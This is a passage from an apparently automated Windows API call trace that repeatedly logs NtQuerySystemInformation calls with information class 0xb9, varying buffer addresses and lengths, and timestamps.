(SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0c0, Length=0x28, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x48, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x28, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.206] NtQuerySystemInformation 